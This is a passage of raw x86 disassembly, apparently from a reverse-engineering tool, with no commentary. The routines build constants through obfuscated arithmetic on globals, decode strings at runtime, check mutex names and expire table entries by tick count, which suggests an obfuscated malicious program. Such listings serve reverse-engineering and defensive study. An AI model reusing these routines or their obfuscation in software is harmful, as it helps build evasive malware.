arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 50h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call ds:dword_44C950 ; GetTickCount
mov [ebp+var_8], eax
mov eax, dword_44D1E0
mov esi, eax
add esi, dword_44D1C8
sub esi, 3
jmp short loc_442E52
; ---------------------------------------------------------------------------
loc_442E1C: ; CODE XREF: sub_442DF5+74�j
cmp ds:dword_4480E0[esi*4], 0
jz short loc_442E51
mov edx, ds:dword_44B830[esi*4]
mov ecx, dword_44D240
add ecx, 0EA60h
mov eax, dword_44D1EC
dec eax
imul ecx, eax
add edx, ecx
cmp edx, [ebp+var_8]
jnb short loc_442E51
and ds:dword_4480E0[esi*4], 0
loc_442E51: ; CODE XREF: sub_442DF5+2F�j
; sub_442DF5+52�j
inc esi
loc_442E52: ; CODE XREF: sub_442DF5+25�j
movsx eax, word_44D160
movsx edx, word_44D0B8
lea eax, [eax+edx+3D9h]
cmp esi, eax
jb short loc_442E1C
loc_442E6B: ; CODE XREF: sub_442DF5+97�j
; sub_442DF5+26B�j
mov eax, [ebx]
mov [ebp+var_14], eax
lea ebx, [ebx+eax]
mov eax, ebx
sub eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb loc_443066
mov eax, dword_44D094
add eax, 2
cmp [ebp+var_14], eax
ja short loc_442E6B
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_442E93: ; CODE XREF: sub_442DF5+A3�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_442E93
mov [ebp+var_10], eax
mov eax, dword_44D118
mov edx, ebx
sub edx, [ebp+arg_0]
mov ecx, eax
add ecx, eax
mov eax, ecx
sub eax, 8
sub edx, eax
mov [ebp+var_C], edx
mov [ebp+var_1], 44h
mov eax, dword_44D104
sub eax, 4
cmp byte ptr [ebx+eax], 2Ah
jnz short loc_442ECB
mov [ebp+var_1], 43h
loc_442ECB: ; CODE XREF: sub_442DF5+D0�j
mov eax, dword_44D0DC
mov edi, eax
add edi, dword_44D09C
dec edi
jmp short loc_442F02
; ---------------------------------------------------------------------------
loc_442EDB: ; CODE XREF: sub_442DF5+11F�j
cmp ds:dword_4480E0[edi*4], 0
jz short loc_442F01
mov edx, [ebp+var_C]
cmp ds:dword_447010[edi*4], edx
jnz short loc_442F01
mov dl, ds:byte_4491B0[edi]
cmp dl, [ebp+var_1]
jz loc_44304B
loc_442F01: ; CODE XREF: sub_442DF5+EE�j
; sub_442DF5+FA�j
inc edi
loc_442F02: ; CODE XREF: sub_442DF5+E4�j
mov eax, dword_44D14C
add eax, 3E0h
add eax, dword_44D240
cmp edi, eax
jb short loc_442EDB
mov eax, dword_44D0CC
add eax, 3B1h
add eax, dword_44D244
cmp [ebp+var_10], eax
jbe loc_442FFB
movsx eax, word_44D090
add eax, 0Ah
push eax
lea eax, [ebp+var_4F]
push eax
call sub_443CD1
add esp, 8
movsx eax, word_44D1C0
add eax, 3B7h
mov [ebp+var_18], eax
movsx eax, word_44D0E4
add eax, dword_44D1CC
sub eax, 3
mov [ebp+var_1C], eax
loc_442F68: ; CODE XREF: sub_442DF5+201�j
mov eax, [ebp+var_18]
mov al, [ebx+eax]
mov [ebp+var_1D], al
mov eax, [ebp+var_18]
mov edx, dword_44D10C
add edx, dword_44D17C
sub edx, 9
mov [ebx+eax], dl
push offset dword_447FD0
push [ebp+var_10]
push [ebp+var_1C]
lea eax, [ebp+var_4F]
push eax
mov eax, [ebp+arg_C]
push dword ptr [eax]
push [ebp+arg_0]
push ebx
push [ebp+arg_8]
mov eax, dword_44D200
movsx edx, word_44D11C
add eax, edx
sub eax, 0Ah
and eax, 0FFh
push eax
call sub_43BC02
add esp, 24h
mov eax, [ebp+var_18]
mov dl, [ebp+var_1D]
mov [ebx+eax], dl
mov [ebp+var_1C], eax
movsx eax, word_44D114
mov edx, dword_44D24C
lea eax, [eax+edx+3AEh]
add [ebp+var_18], eax
mov eax, [ebp+var_10]
cmp [ebp+var_18], eax
jbe short loc_442FEE
mov [ebp+var_18], eax
loc_442FEE: ; CODE XREF: sub_442DF5+1F4�j
mov eax, [ebp+var_10]
cmp [ebp+var_1C], eax
jnb short loc_443046
jmp loc_442F68
; ---------------------------------------------------------------------------
loc_442FFB: ; CODE XREF: sub_442DF5+134�j
push offset byte_44DC51
call sub_43AC82
push offset dword_447FD0
push [ebp+var_10]
movsx edx, word_44D128
sub edx, 5
push edx
push eax
mov edx, [ebp+arg_C]
push dword ptr [edx]
push [ebp+arg_0]
push ebx
push [ebp+arg_8]
mov edx, dword_44D238
movsx ecx, word_44D190
add edx, ecx
sub edx, 0Eh
and edx, 0FFh
push edx
call sub_43BC02
add esp, 28h
loc_443046: ; CODE XREF: sub_442DF5+1FF�j
mov eax, [ebp+arg_C]
inc dword ptr [eax]
loc_44304B: ; CODE XREF: sub_442DF5+106�j
mov eax, [ebp+var_10]
lea ebx, [ebx+eax]
inc ebx
mov eax, [ebp+arg_C]
mov edx, dword_44D208
add edx, 0Eh
cmp [eax], edx
jbe loc_442E6B
loc_443066: ; CODE XREF: sub_442DF5+86�j
push offset byte_44DC4D
call sub_43AC82
push offset dword_447FD0
mov edx, dword_44D1C8
mov ecx, dword_44D214
add ecx, edx
sub ecx, 3
push ecx
movsx ecx, word_44D120
add ecx, dword_44D0C0
sub ecx, 0Dh
push ecx
push eax
add edx, dword_44D17C
sub edx, 0Bh
push edx
push 0
push 0
push [ebp+arg_8]
mov edx, dword_44D10C
movsx ecx, word_44D1F0
add edx, ecx
dec edx
and edx, 0FFh
push edx
call sub_43BC02
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_442DF5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4430CE proc near ; CODE XREF: sub_43A39F:loc_43A3DA�p
; sub_44475F+271�p
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 108h
push esi
push edi
mov edi, dword_44D1E0
add edi, 4
jmp short loc_44315D
; ---------------------------------------------------------------------------
loc_4430E4: ; CODE XREF: sub_4430CE+9B�j
push offset byte_44DC41
call sub_43AC82
mov [ebp+var_108], eax
push offset byte_44DC37
call sub_43AC82
push edi
push eax
mov esi, [ebp+var_108]
push esi
lea esi, [ebp+var_FF]
push esi
call ds:dword_44C810
add esp, 18h
lea eax, [ebp+var_FF]
push eax
push 0
push 100000h
call ds:dword_44B81C ; OpenMutexA
mov [ebp+var_104], eax
or eax, eax
jz short loc_44315C
push eax
call ds:dword_44B82C ; CloseHandle
movsx eax, word_44D120
add eax, dword_44D10C
sub eax, 4
cmp edi, eax
jnz short loc_443155
xor eax, eax
inc eax
jmp short loc_443171
; ---------------------------------------------------------------------------
loc_443155: ; CODE XREF: sub_4430CE+80�j
mov eax, 2
jmp short loc_443171
; ---------------------------------------------------------------------------
loc_44315C: ; CODE XREF: sub_4430CE+65�j
inc edi
loc_44315D: ; CODE XREF: sub_4430CE+14�j
movsx eax, word_44D1C0
add eax, 5Bh
cmp edi, eax
jb loc_4430E4
xor eax, eax
loc_443171: ; CODE XREF: sub_4430CE+85�j
; sub_4430CE+8C�j
pop edi
pop esi
leave
retn
sub_4430CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_443175 proc near ; DATA XREF: .data:0044D344�o
push ebp
mov ebp, esp
push offset dword_44CD8C
call ds:dword_4499F4 ; InterlockedIncrement
mov eax, ds:dword_44CD8C
pop ebp
retn 4
sub_443175 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44318C proc near ; CODE XREF: sub_43E524+296�p
; sub_43EB7A+3AC�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
inc esi
mov edi, dword_44D1A8
add edi, 11h
movsx ebx, word_44D160
add edi, ebx
mov eax, esi
test eax, eax
jge short loc_4431B6
add eax, 0FFh
loc_4431B6: ; CODE XREF: sub_44318C+23�j
sar eax, 8
movsx ebx, word_44D128
mov ecx, dword_44D18C
lea ebx, [ebx+ecx+3]
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_8], edi
mov edi, dword_44D1A0
add edi, 13h
movsx ebx, word_44D0E4
add edi, ebx
mov eax, esi
test eax, eax
jge short loc_4431F1
add eax, 0FFh
loc_4431F1: ; CODE XREF: sub_44318C+5E�j
sar eax, 8
mov ebx, dword_44D230
add ebx, 0Ah
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_C], edi
mov edi, dword_44D240
add edi, 18h
add edi, dword_44D17C
mov eax, esi
test eax, eax
jge short loc_443221
add eax, 0FFFFh
loc_443221: ; CODE XREF: sub_44318C+8E�j
sar eax, 10h
movsx ebx, word_44D180
add ebx, 12h
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_10], edi
mov eax, esi
mul [ebp+var_8]
mov [ebp+var_1C], eax
and eax, 0FFh
push eax
call sub_444356
mov ebx, eax
mov [ebp+var_1], bl
mov eax, dword_44D1FC
add eax, 8
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_43DF69
mov ebx, eax
mov [ebp+var_11], bl
mov eax, esi
mul [ebp+var_C]
mov [ebp+var_20], eax
and eax, 0FFh
push eax
call sub_444356
mov ebx, eax
mov [ebp+var_12], bl
mov eax, dword_44D09C
add eax, 6Ah
add eax, dword_44D200
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_43DF69
mov ebx, eax
mov [ebp+var_13], bl
mov eax, esi
and eax, 0FFh
push eax
call sub_444356
mov ebx, eax
mov [ebp+var_14], bl
movsx eax, word_44D21C
mov edx, dword_44D24C
lea eax, [eax+edx+20h]
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_43DF69
mov ebx, eax
mov [ebp+var_15], bl
mov eax, esi
mul [ebp+var_10]
mov [ebp+var_24], eax
and eax, 0FFh
push eax
call sub_444356
mov ebx, eax
mov [ebp+var_16], bl
movsx eax, word_44D1F0
add eax, 47h
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_43DF69
mov ebx, eax
mov [ebp+var_17], bl
mov eax, dword_44D0CC
add eax, 3Bh
add eax, dword_44D094
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_444356
add esp, 24h
mov ebx, eax
mov [ebp+var_18], bl
movzx edi, [ebp+var_1]
mov eax, edi
shr eax, 1
movsx esi, word_44D0E8
add esi, dword_44D1D8
sub esi, 5
mul esi
mov [ebp+var_28], eax
mov esi, eax
cmp esi, edi
jnz short loc_4433B0
push offset byte_44DC1D
call sub_43AC82
movzx edi, [ebp+var_18]
push edi
movzx edi, [ebp+var_17]
push edi
movzx edi, [ebp+var_16]
push edi
movzx edi, [ebp+var_15]
push edi
movzx edi, [ebp+var_14]
push edi
movzx edi, [ebp+var_13]
push edi
movzx edi, [ebp+var_12]
push edi
movzx edi, [ebp+var_11]
push edi
movzx edi, [ebp+var_1]
push edi
push eax
push [ebp+arg_0]
call ds:dword_44C810
add esp, 30h
jmp short loc_4433F4
; ---------------------------------------------------------------------------
loc_4433B0: ; CODE XREF: sub_44318C+1DC�j
push offset word_44DC02
call sub_43AC82
movzx edi, [ebp+var_18]
push edi
movzx edi, [ebp+var_17]
push edi
movzx edi, [ebp+var_16]
push edi
movzx edi, [ebp+var_15]
push edi
movzx edi, [ebp+var_14]
push edi
movzx edi, [ebp+var_13]
push edi
movzx edi, [ebp+var_12]
push edi
movzx edi, [ebp+var_11]
push edi
movzx edi, [ebp+var_1]
push edi
push eax
push [ebp+arg_0]
call ds:dword_44C810
add esp, 30h
loc_4433F4: ; CODE XREF: sub_44318C+222�j
pop edi
pop esi
pop ebx
leave
retn
sub_44318C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4433F9 proc near ; CODE XREF: sub_43D16C+24F�p
; sub_444ACE+2BD�p
var_32C = dword ptr -32Ch
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_316 = byte ptr -316h
var_212 = byte ptr -212h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 32Ch
push ebx
push esi
push edi
push [ebp+arg_4]
call ds:dword_44C80C
pop ecx
push [ebp+arg_0]
lea eax, [ebp+var_316]
push eax
call sub_445970
lea ecx, [ebp+var_316]
or eax, 0FFFFFFFFh
loc_443427: ; CODE XREF: sub_4433F9+33�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_443427
mov ebx, eax
sub ebx, dword_44D1E4
movsx edx, word_44D1C0
add edx, dword_44D16C
sub edx, 0Bh
mov [ebp+ebx+var_316], dl
mov edi, dword_44D248
loc_443453: ; CODE XREF: sub_4433F9+164�j
mov eax, edi
movsx ecx, word_44D204
movsx ebx, word_44D1F0
add ecx, ebx
sub ecx, 6
mul ecx
mov [ebp+var_320], eax
movsx eax, [ebp+edi+var_316]
mov edx, [ebp+var_320]
mov [ebp+edx+var_212], al
mov eax, edi
mov ecx, dword_44D0D4
add ecx, 2
add ecx, dword_44D0F0
mul ecx
mov [ebp+var_324], eax
mov eax, dword_44D1AC
sub eax, 4
mov edx, [ebp+var_324]
add edx, eax
movsx eax, word_44D164
sub eax, 4
mov [ebp+edx+var_212], al
movsx eax, [ebp+edi+var_316]
mov edx, dword_44D0BC
movsx ecx, word_44D0A0
add edx, ecx
sub edx, 3
cmp eax, edx
jnz short loc_44355C
mov eax, edi
mov ecx, dword_44D178
sub ecx, 3
mul ecx
mov [ebp+var_328], eax
mov eax, dword_44D0D0
add eax, dword_44D1E4
mov edx, [ebp+var_328]
add edx, eax
mov eax, dword_44D188
sub eax, 9
mov [ebp+edx+var_212], al
mov eax, edi
movsx ecx, word_44D190
add ecx, dword_44D198
sub ecx, 0Ch
mul ecx
mov [ebp+var_32C], eax
mov eax, dword_44D0EC
movsx edx, word_44D128
add eax, edx
sub eax, 8
mov edx, [ebp+var_32C]
add edx, eax
mov eax, dword_44D1C4
add eax, dword_44D224
sub eax, 6
mov [ebp+edx+var_212], al
jmp short loc_443562
; ---------------------------------------------------------------------------
loc_44355C: ; CODE XREF: sub_4433F9+E2�j
inc edi
jmp loc_443453
; ---------------------------------------------------------------------------
loc_443562: ; CODE XREF: sub_4433F9+161�j
cmp dword_44D26C, 0
jz short loc_4435A5
lea eax, [ebp+var_212]
push eax
push 0
call ds:dword_4495B4
mov esi, eax
or esi, esi
jz short loc_4435A5
cmp dword_44D270, 0
jz short loc_4435C6
movsx eax, word_44D128
sub eax, 4
neg eax
push eax
lea eax, [ebp+var_212]
push eax
push 0
call ds:dword_446020
loc_4435A5: ; CODE XREF: sub_4433F9+170�j
; sub_4433F9+185�j
push ds:dword_4495C4
push ds:off_44C7E0
lea eax, [ebp+var_316]
push eax
call sub_43F4CC
add esp, 0Ch
mov [ebp+var_31C], eax
loc_4435C6: ; CODE XREF: sub_4433F9+18E�j
pop edi
pop esi
pop ebx
leave
retn
sub_4433F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4435CB proc near ; CODE XREF: sub_43E8B9+126�p
; sub_4425A6+1E�p ...
var_1008C = dword ptr -1008Ch
var_10088 = dword ptr -10088h
var_10084 = dword ptr -10084h
var_10080 = dword ptr -10080h
var_1007C = dword ptr -1007Ch
var_10078 = word ptr -10078h
var_10070 = dword ptr -10070h
var_10064 = dword ptr -10064h
var_10060 = dword ptr -10060h
var_1005C = dword ptr -1005Ch
var_10055 = byte ptr -10055h
var_10054 = dword ptr -10054h
var_10050 = dword ptr -10050h
var_1004C = dword ptr -1004Ch
var_10048 = dword ptr -10048h
var_10044 = dword ptr -10044h
var_1003F = byte ptr -1003Fh
var_40 = word ptr -40h
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 1008Ch
call sub_445950
push ebx
push esi
push edi
mov [ebp+var_40], 8
push offset dword_44DBF4
call sub_442CEF
pop ecx
push eax
call ds:dword_446FF8
mov [ebp+var_38], eax
lea eax, [ebp+var_2C]
push eax
lea esi, [ebp+var_40]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_4]
push edi
mov edi, [edi]
call dword ptr [edi+30h]
mov ebx, eax
movsx eax, word_44D23C
add eax, dword_44D140
sub eax, 0Eh
cmp ebx, eax
jz short loc_44362F
xor eax, eax
jmp loc_443CB5
; ---------------------------------------------------------------------------
loc_44362F: ; CODE XREF: sub_4435CB+5B�j
lea eax, [ebp+var_24]
push eax
push offset dword_44EC54
mov eax, [ebp+var_2C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44D130
add eax, dword_44D108
sub eax, 0Bh
cmp ebx, eax
jnz loc_443CAA
lea eax, [ebp+var_28]
push eax
mov eax, [ebp+var_24]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
movsx eax, word_44D090
sub eax, 5
cmp ebx, eax
jnz loc_443CA1
mov eax, dword_44D20C
add eax, dword_44D1A0
sub eax, 7
mov [ebp+var_1C], eax
jmp loc_443C95
; ---------------------------------------------------------------------------
loc_443696: ; CODE XREF: sub_4435CB+6D0�j
mov [ebp+var_18], 2
mov eax, [ebp+var_1C]
mov [ebp+var_10], eax
lea eax, [ebp+var_4]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_24]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
mov eax, dword_44D1D0
sub eax, 5
cmp ebx, eax
jnz loc_443C92
and [ebp+var_10044], 0
lea eax, [ebp+var_10044]
push eax
push offset dword_44EC64
mov eax, [ebp+var_4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44D1D4
sub eax, 5
cmp ebx, eax
jnz loc_443C6E
cmp [ebp+var_10044], 0
jz loc_443C6E
lea eax, [ebp+var_20]
push eax
mov eax, [ebp+var_10044]
push eax
mov edi, [eax]
call dword ptr [edi+0F8h]
mov ebx, eax
or ebx, ebx
jnz loc_443C6E
lea eax, [ebp+var_1003F]
push eax
push [ebp+var_20]
call sub_43B896
mov eax, dword_44D1E0
add eax, dword_44D1D8
sub eax, 3
push eax
push offset dword_44A1F0
lea eax, [ebp+var_1003F]
push eax
call sub_444D98
add esp, 14h
movsx edi, word_44D12C
mov esi, dword_44D0FC
lea edi, [edi+esi+0FFF0h]
cmp eax, edi
jz loc_443C6E
movsx eax, word_44D23C
add eax, dword_44D1BC
sub eax, 7
cmp [ebp+arg_8], eax
jnz short loc_4437BB
mov eax, [ebp+var_10044]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
xor eax, eax
inc eax
jmp loc_443CB5
; ---------------------------------------------------------------------------
loc_4437BB: ; CODE XREF: sub_4435CB+1D1�j
mov eax, dword_44D0D4
add eax, 3
add eax, dword_44D248
cmp [ebp+arg_8], eax
jnz short loc_4437FF
and [ebp+var_10088], 0
lea eax, [ebp+var_10088]
push eax
push offset dword_44ECA4
mov eax, [ebp+var_10044]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
and [ebp+var_1008C], 0
jmp loc_443C6E
; ---------------------------------------------------------------------------
loc_4437FF: ; CODE XREF: sub_4435CB+201�j
and [ebp+var_1007C], 0
lea eax, [ebp+var_1007C]
push eax
push offset dword_44EC84
mov eax, [ebp+var_4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44D234
add eax, dword_44D1D8
sub eax, 6
cmp ebx, eax
jnz loc_443C6E
mov [ebp+var_10055], 44h
push offset dword_44DBEC
call sub_43AC82
mov edi, dword_44D1D0
movsx esi, word_44D1DC
add edi, esi
sub edi, 0Dh
push edi
push eax
lea edi, [ebp+var_1003F]
push edi
call sub_444D98
add esp, 10h
mov esi, dword_44D0E0
add esi, 0FFFBh
add esi, dword_44D124
cmp eax, esi
jz short loc_443888
mov [ebp+var_10055], 43h
loc_443888: ; CODE XREF: sub_4435CB+2B4�j
push offset dword_44DBE4
call sub_43AC82
movsx edi, word_44D0B4
add edi, dword_44D154
sub edi, 6
push edi
push eax
lea edi, [ebp+var_1003F]
push edi
call sub_444D98
add esp, 10h
movsx esi, word_44D11C
mov edi, eax
add edi, esi
mov [ebp+var_10064], edi
mov [ebp+var_10050], edi
loc_4438CA: ; CODE XREF: sub_4435CB+315�j
mov eax, [ebp+var_10050]
cmp [ebp+eax+var_1003F], 26h
jz short loc_4438E2
inc [ebp+var_10050]
jmp short loc_4438CA
; ---------------------------------------------------------------------------
loc_4438E2: ; CODE XREF: sub_4435CB+30D�j
mov eax, [ebp+var_10050]
mov edx, dword_44D104
add edx, dword_44D1C4
sub edx, 5
mov [ebp+eax+var_1003F], dl
mov eax, [ebp+var_10064]
lea eax, [ebp+eax+var_1003F]
push eax
call ds:dword_447008
mov [ebp+var_10080], eax
push offset byte_44DBDD
call sub_43AC82
push dword_44D18C
push eax
lea edi, [ebp+var_1003F]
push edi
call sub_444D98
add esp, 14h
mov esi, dword_44D154
movsx edx, word_44D144
add esi, edx
sub esi, 9
mov edi, eax
add edi, esi
mov [ebp+var_10064], edi
mov [ebp+var_10050], edi
loc_44395A: ; CODE XREF: sub_4435CB+3A5�j
mov eax, [ebp+var_10050]
cmp [ebp+eax+var_1003F], 26h
jz short loc_443972
inc [ebp+var_10050]
jmp short loc_44395A
; ---------------------------------------------------------------------------
loc_443972: ; CODE XREF: sub_4435CB+39D�j
mov eax, [ebp+var_10050]
movsx edx, word_44D190
movsx ecx, word_44D110
add edx, ecx
sub edx, 5
mov [ebp+eax+var_1003F], dl
mov eax, [ebp+var_10064]
lea eax, [ebp+eax+var_1003F]
push eax
call ds:dword_447008
pop ecx
mov [ebp+var_1005C], eax
mov eax, dword_44D214
dec eax
cmp [ebp+var_10080], eax
ja short loc_443A1B
mov eax, dword_44D15C
mov [ebp+var_10048], eax
jmp short loc_443A09
; ---------------------------------------------------------------------------
loc_4439C8: ; CODE XREF: sub_4435CB+44E�j
mov edi, [ebp+var_10048]
mov esi, edi
shl esi, 2
cmp ds:dword_4480E0[esi], 0
jz short loc_443A03
mov edx, [ebp+var_1005C]
cmp ds:dword_447010[esi], edx
jnz short loc_443A03
mov dl, ds:byte_4491B0[edi]
cmp dl, [ebp+var_10055]
jnz short loc_443A03
and ds:dword_4480E0[edi*4], 0
loc_443A03: ; CODE XREF: sub_4435CB+410�j
; sub_4435CB+41F�j ...
inc [ebp+var_10048]
loc_443A09: ; CODE XREF: sub_4435CB+3FB�j
mov eax, dword_44D19C
add eax, 3DFh
cmp [ebp+var_10048], eax
jb short loc_4439C8
loc_443A1B: ; CODE XREF: sub_4435CB+3EE�j
call ds:dword_44C950 ; GetTickCount
mov [ebp+var_10060], eax
movsx eax, word_44D180
sub eax, 5
mov [ebp+var_1004C], eax
jmp short loc_443A8B
; ---------------------------------------------------------------------------
loc_443A39: ; CODE XREF: sub_4435CB+4D0�j
mov edi, [ebp+var_1004C]
shl edi, 2
cmp ds:dword_4480E0[edi], 0
jz short loc_443A85
mov edi, ds:dword_44B830[edi]
movsx esi, word_44D0B8
add esi, 0EA57h
movsx edx, word_44D1F0
add edx, 3
imul esi, edx
add edi, esi
cmp edi, [ebp+var_10060]
jnb short loc_443A85
mov edi, [ebp+var_1004C]
and ds:dword_4480E0[edi*4], 0
loc_443A85: ; CODE XREF: sub_4435CB+47F�j
; sub_4435CB+4AA�j
inc [ebp+var_1004C]
loc_443A8B: ; CODE XREF: sub_4435CB+46C�j
mov eax, dword_44D0A4
add eax, 3DFh
cmp [ebp+var_1004C], eax
jb short loc_443A39
mov eax, dword_44D170
add eax, dword_44D24C
sub eax, 0Eh
mov [ebp+var_10054], eax
jmp short loc_443AC9
; ---------------------------------------------------------------------------
loc_443AB3: ; CODE XREF: sub_4435CB+50E�j
mov edi, [ebp+var_10054]
cmp ds:dword_4480E0[edi*4], 0
jz short loc_443ADB
inc [ebp+var_10054]
loc_443AC9: ; CODE XREF: sub_4435CB+4E6�j
mov eax, dword_44D0B0
add eax, 3DFh
cmp [ebp+var_10054], eax
jb short loc_443AB3
loc_443ADB: ; CODE XREF: sub_4435CB+4F6�j
mov edi, [ebp+var_10054]
mov esi, [ebp+var_1005C]
mov ds:dword_447010[edi*4], esi
mov eax, edi
mov dl, [ebp+var_10055]
mov ds:byte_4491B0[eax], dl
mov esi, [ebp+arg_0]
mov ds:dword_446050[edi*4], esi
movsx eax, word_44D0F4
sub eax, 7
cmp [ebp+var_10080], eax
jbe loc_443BBE
mov esi, dword_44D158
add esi, 0FFEEh
movsx edx, word_44D144
add esi, edx
mov ds:word_449A10[edi*2], si
mov eax, dword_44D240
mov [ebp+var_10088], eax
jmp short loc_443BAA
; ---------------------------------------------------------------------------
loc_443B47: ; CODE XREF: sub_4435CB+5EF�j
mov edi, [ebp+var_10088]
mov esi, edi
shl esi, 2
cmp ds:dword_4480E0[esi], 0
jz short loc_443BA4
movzx edx, ds:word_449A10[edi*2]
mov ecx, dword_44D154
add ecx, 0FFF8h
add ecx, dword_44D1B4
cmp edx, ecx
jz short loc_443BA4
mov edx, [ebp+var_1005C]
cmp ds:dword_447010[esi], edx
jnz short loc_443BA4
mov dl, ds:byte_4491B0[edi]
cmp dl, [ebp+var_10055]
jnz short loc_443BA4
lea edi, ds:449A10h[edi*2]
inc word ptr [edi]
jmp short loc_443BD5
; ---------------------------------------------------------------------------
loc_443BA4: ; CODE XREF: sub_4435CB+58F�j
; sub_4435CB+5AD�j ...
inc [ebp+var_10088]
loc_443BAA: ; CODE XREF: sub_4435CB+57A�j
mov eax, dword_44D0EC
add eax, 3E2h
cmp [ebp+var_10088], eax
jb short loc_443B47
jmp short loc_443BD5
; ---------------------------------------------------------------------------
loc_443BBE: ; CODE XREF: sub_4435CB+54C�j
mov edi, [ebp+var_10054]
mov esi, dword_44D178
sub esi, 4
mov ds:word_449A10[edi*2], si
loc_443BD5: ; CODE XREF: sub_4435CB+5D7�j
; sub_4435CB+5F1�j
call ds:dword_44C950 ; GetTickCount
mov edi, [ebp+var_10054]
mov ds:dword_44B830[edi*4], eax
lea esi, off_44D320
mov ds:dword_4480E0[edi*4], esi
mov edi, [ebp+var_10054]
lea edi, ds:4480E0h[edi*4]
mov [ebp+var_10084], edi
mov eax, edi
push eax
mov esi, [eax]
call dword ptr [esi+4]
mov [ebp+var_10078], 9
mov edi, [ebp+var_10054]
lea edi, ds:4480E0h[edi*4]
mov [ebp+var_10070], edi
lea esi, [ebp+var_10078]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_1007C]
push edi
mov edi, [edi]
call dword ptr [edi+0A4h]
mov ebx, eax
inc [ebp+var_10054]
lea eax, [ebp+var_10078]
push eax
call ds:dword_44CD94
mov eax, [ebp+var_1007C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_443C6E: ; CODE XREF: sub_4435CB+140�j
; sub_4435CB+14D�j ...
cmp [ebp+var_10044], 0
jz short loc_443C83
mov eax, [ebp+var_10044]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_443C83: ; CODE XREF: sub_4435CB+6AA�j
cmp [ebp+var_4], 0
jz short loc_443C92
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_443C92: ; CODE XREF: sub_4435CB+10E�j
; sub_4435CB+6BC�j
inc [ebp+var_1C]
loc_443C95: ; CODE XREF: sub_4435CB+C6�j
mov eax, [ebp+var_28]
cmp [ebp+var_1C], eax
jb loc_443696
loc_443CA1: ; CODE XREF: sub_4435CB+AF�j
mov eax, [ebp+var_24]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_443CAA: ; CODE XREF: sub_4435CB+8E�j
mov eax, [ebp+var_2C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
xor eax, eax
loc_443CB5: ; CODE XREF: sub_4435CB+5F�j
; sub_4435CB+1EB�j
pop edi
pop esi
pop ebx
leave
retn
sub_4435CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_443CBA proc near ; DATA XREF: .data:0044D368�o
push ebp
mov ebp, esp
push offset dword_4495B8
call ds:dword_4499F4 ; InterlockedIncrement
mov eax, ds:dword_4495B8
pop ebp
retn 4
sub_443CBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_443CD1 proc near ; CODE XREF: sub_43E524+FD�p
; sub_43EB7A+404�p ...
arg_0 = dword ptr 8
